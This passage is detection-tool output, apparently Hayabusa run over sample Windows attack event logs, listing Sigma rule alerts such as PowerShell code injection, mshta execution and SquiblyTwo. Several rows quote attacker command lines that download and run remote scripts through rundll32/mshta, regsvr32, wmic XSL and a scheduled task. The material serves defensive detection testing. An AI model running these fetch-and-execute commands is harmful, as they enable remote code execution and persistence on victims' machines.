Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx -2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid : Command: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js : Path: C:\ProgramData\winpm.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 
Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx -2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories : Command: attrib +h nbtscan.exe : Path: C:\Windows\System32\attrib.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx -2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx -2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" : Path: C:\Users\IEUser\Downloads\com-hijack.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 
-2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /c test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:08.728 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla 
Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
"";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process 
Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx -2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx -2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx -2019-05-24 01:50:44.582 